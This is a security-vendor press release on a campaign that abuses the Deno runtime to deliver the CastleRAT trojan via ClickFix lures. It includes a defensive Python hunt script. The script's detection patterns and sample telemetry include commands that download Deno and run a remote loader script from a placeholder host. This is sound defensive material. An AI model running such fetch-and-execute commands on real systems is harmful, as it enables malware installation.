ThreatDown, the corporate business unit of Malwarebytes, today published research documenting what researchers believe to be the first documented case of attackers abusing the Deno JavaScript runtime as a malware execution framework. The attack was uncovered by ThreatDown’s Endpoint Detection and Response (EDR) team.
The multi-stage infection chain ultimately installs CastleRAT, a remote access Trojan capable of credential theft, surveillance and remote command execution. The malware executes entirely in system memory and never appears on disk as a traditional executable file.
The campaign highlights an evolution in attacker tradecraft. Rather than relying on malicious binaries, the attackers leveraged Deno—a legitimate, code-signed JavaScript runtime widely used by developers—to execute obfuscated scripts that retrieve additional payloads. Because the activity occurs inside a trusted process, traditional antivirus tools that rely on file-based scanning may fail to detect it.
Threat actors have long abused built-in operating system tools in “living-off-the-land” attacks, but the use of a developer runtime like Deno represents a new expansion of that technique.
“This is the first time we’ve seen attackers co-opt the Deno runtime in the wild, and it signals a broader shift in how threat actors think about evasion,” said Marco Giuliani, Vice President, Head of Research at ThreatDown. “Deno is legitimate software that security products trust. By exploiting that trust, attackers can execute malicious code in ways many endpoint defenses aren’t designed to monitor.”
The research was led by Lorenzo Corazzi, Malware Research Engineer at ThreatDown.
How the Attack Works
ThreatDown’s research details a multi-phase infection chain designed for maximum stealth. The attackers employ a three-step process to bypass traditional endpoint defenses:
- Phase 1: Social Engineering via “ClickFix.” The attack begins with a ClickFix lure—a fake browser error or CAPTCHA prompt that instructs the user to copy and paste a command. This effectively bypasses web security filters because the user voluntarily executes the initial script themselves.
- Phase 2: First-of-Its-Kind Deno Abuse. The initial script silently downloads and installs Deno, a legitimate, widely used and code-signed JavaScript runtime. By using Deno as a Trojan horse to execute obfuscated code, the attack inherits the privileges of trusted processes and evades behavioral alarms.
- Phase 3: Steganography and In-Memory Execution. The attackers hide the encrypted final payload inside a seemingly innocuous JPEG image. A disguised script decodes the image and injects the malware directly into system memory. The payload never touches the hard drive as an executable file, rendering traditional file-scanning antivirus engines useless.
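The chain above gives defenders two process-level signals that do not depend on a file hash: a user shell (launched from Explorer, as a pasted ClickFix command would be) downloading the Deno runtime, and a Deno process that was started from that Explorer-to-shell chain rather than from a developer tool. The following hunt logic is an added example written for this article, not ThreatDown's detection code, and the Deno command-line features it looks for (a remote module URL, broad `--allow-*` permissions) are generic Deno runtime behaviour rather than anything the research attributes to this campaign. The process-creation events, the weights and the threshold are all constructed and would need tuning against a real fleet's baseline of legitimate Deno use.

```python
# Added example: score Sysmon-style process-creation events for the
# "Deno as a loader" pattern. Events, weights and threshold are constructed
# for illustration; the Deno flags matched are real runtime options.
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Image name ends in deno / deno.exe, whatever directory it was dropped in.
DENO_IMAGE = re.compile(r"(?:^|[\\/])deno(?:\.exe)?$", re.IGNORECASE)
# `deno run` / `deno eval` pointed at an http(s) module instead of a local file.
REMOTE_MODULE = re.compile(r"\bdeno(?:\.exe)?\b.*\b(?:run|eval)\b.*https?://", re.IGNORECASE)
# Broad permission grants that a downloader/loader script would need.
BROAD_PERMS = re.compile(r"(?:\s-A\b|--allow-(?:all|net|run|write|ffi)\b)")
# A user shell fetching something named "deno" (assumed downloader verbs).
DOWNLOAD_DENO = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|certutil)\b.*\bdeno\b",
    re.IGNORECASE,
)
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Tuple[int, List[str]]:
    """Return an assumed risk score and the reasons for one event."""
    score, reasons = 0, []
    parent = by_pid.get(ev.ppid)
    grandparent = by_pid.get(parent.ppid) if parent else None
    if DENO_IMAGE.search(ev.image):
        if REMOTE_MODULE.search(ev.cmdline):
            score += 2
            reasons.append("deno executes a remote module")
        if BROAD_PERMS.search(ev.cmdline):
            score += 1
            reasons.append("deno granted broad permissions")
        if (parent and _basename(parent.image) in USER_SHELLS
                and grandparent and _basename(grandparent.image) == "explorer.exe"):
            score += 2
            reasons.append("explorer -> shell -> deno chain (pasted command, not a dev tool)")
    elif _basename(ev.image) in USER_SHELLS and DOWNLOAD_DENO.search(ev.cmdline):
        score += 2
        reasons.append("user shell downloading the Deno runtime")
    return score, reasons


def hunt(events: List[ProcEvent], threshold: int = 2) -> Dict[int, dict]:
    """Map pid -> {score, reasons} for every event at or above the threshold."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, dict] = {}
    for ev in events:
        score, reasons = score_event(ev, by_pid)
        if score >= threshold:
            findings[ev.pid] = {"score": score, "reasons": reasons}
    return findings


# Constructed sample telemetry (not from the real incident). example.invalid
# is a reserved placeholder domain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -c "iwr https://example.invalid/deno.zip -OutFile $env:TEMP\deno.zip"'),
    ProcEvent(300, 200, r"C:\Users\u\AppData\Local\deno\deno.exe",
              "deno.exe run -A https://example.invalid/loader.ts"),
    # Benign baseline: a developer running Deno from an IDE on a local file.
    ProcEvent(500, 100, r"C:\Program Files\Microsoft VS Code\Code.exe", "Code.exe"),
    ProcEvent(400, 500, r"C:\Users\dev\.deno\bin\deno.exe", "deno run --allow-net main.ts"),
]

if __name__ == "__main__":
    for pid, finding in hunt(SAMPLE_EVENTS).items():
        print(pid, finding["score"], "; ".join(finding["reasons"]))
```

The parent-chain rule is the one that carries the weight here: a developer's Deno process is normally a child of a terminal or IDE, while a pasted ClickFix command produces an Explorer-to-shell-to-Deno lineage, which is a cheap thing to alert on regardless of what the script does next. The permission and remote-module signals on their own are noisy (the benign event above scores 1 and is not reported), so they are better used to rank than to trigger.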
CastleRAT Capabilities: Total Machine Control
Once established in memory, CastleRAT takes total control of the compromised machine. Hiding behind legitimate processes, the malware leverages advanced abuse of low-level Windows APIs to conduct devastating espionage. Key capabilities include:
- Total Espionage & Cryptocurrency Theft: Silent keylogging and clipboard hijacking to steal credentials, passwords and cryptocurrency wallet addresses.
- Audio/Video Surveillance: Covert initialization of the victim’s webcams and microphones for real-time monitoring.
- Invisible Backdoors: Anonymous communication pipes that grant attackers full remote access with no visible console window, coupled with persistence mechanisms to survive system reboots.
ThreatDown detects and blocks this attack chain at multiple stages, identifying its components as Trojan.CastleLoader and Trojan.CastleRAT. Rather than relying on file-based scanning, ThreatDown’s behavioral monitoring analyzes anomalies in process execution and severs communication with command-and-control servers before data is stolen.
Security teams can find indicators of compromise and the full technical analysis on the ThreatDown blog: CastleRAT attack first to abuse Deno JavaScript runtime to evade enterprise security.